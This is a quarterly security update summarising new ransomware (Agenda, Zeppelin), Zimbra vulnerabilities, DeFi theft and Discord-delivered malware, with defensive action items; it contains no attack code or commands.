Q3 2022 Security Update: Customized Ransomware Types Identified

Ransomware and other types of malware are now more customizable and tailored to victims.

Ransomware Type Can be Customized for Victims

A new ransomware type discovered in the wild, Agenda, has targeted healthcare and education organizations. It reportedly allows actors to tailor the binary payloads for each victim so that they can decide on the ransomware note, encryption, and the list of processes or services to terminate before encrypting data. This ransomware type also takes advantage of safe mode to avoid detection.

Action Items:

Zeppelin Ransomware

The FBI and CISA warn of Zeppelin ransomware, a derivative of the Delphi-based Vega malware family that functions as Ransomware as a Service. Since 2019, actors have used the malware to target defense contractors, educational institutions, manufacturers, technology companies, and healthcare organizations.

With this ransomware type, actors gain access to networks by RDP exploitation, using SonicWall firewall vulnerabilities and phishing campaigns. Prior to deploying the ransomware, actors spend one or two weeks mapping the victim network to identify cloud storage and network backups.

Action Items:

  • Review the brief at gov
  • Strengthen your password policy
  • Require multifactor authentication (MFA)
  • Keep all software and firmware up to date
  • Segment networks
  • Use a monitoring tool to identify unusual activity
  • Grant permissions based on the principle of least privilege
  • Maintain offline backups of data and ensure all backup data is encrypted and immutable
  • Implement a recovery plan
  • Download the YARA signature for Zeppelin

Multiple CVEx Exploit Zimbra Collaboration Suite Vulnerabilities

The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) report multiple common vulnerabilities and exposures (CVEs) against the Zimbra Collaboration Suite (ZCS), a collaboration and email platform.

CVEs include:

  • CVE-2022-24682
  • CVE-2022-27924
  • CVE-2022-27925 chained with CVE-2022-37042
  • CVE-2022-30333

Unpatched ZCS accounts are at risk.

Action items:

CISA and MS-ISAC recommend:

DeFi Vulnerabilities Enable Hackers to Steal Cryptocurrency

The FBI has identified actors exploiting vulnerabilities in DeFi smart contracts to steal investors’ cryptocurrency. The FBI reports that actors have stolen approximately $2.3 billion from January to March 2022, with almost 97 percent from DeFi platforms.

Action Items:

  • Research platforms, protocols, and smart contracts before investing
  • Ensure the DeFi platform has used independent auditors for code audits
  • Stay alert to risks from crowdsourced solutions for vulnerability identification and patching – some participants may have malicious intentions.
  • Victims should contact the FBI through their local field office or the Internet Crime Complaint Center.

Actor Uses Discord to Steal Data

Snyk security researchers, who monitor open source systems, have found 12 unique pieces of malware from the same actor. The malicious packages were designed to avoid detection while they infiltrated Windows and executed malicious files from the Discord content delivery network onto the host.

The malware targets data stored for user applications. When executed, it attempts to steal Google Chrome passwords, cookies, web history, search history, and bookmarks. With that information, actors can move through a victim’s accounts with their credentials.

Action Items:

  • See the Snyk blog for the cyphers package, including a deep look at the malware’s executables.
  • Update security policies to prohibit users on your network from visiting sites other than those necessary for work.

 

For more security updates and insights, visit DevPro Journal’s Security resources page.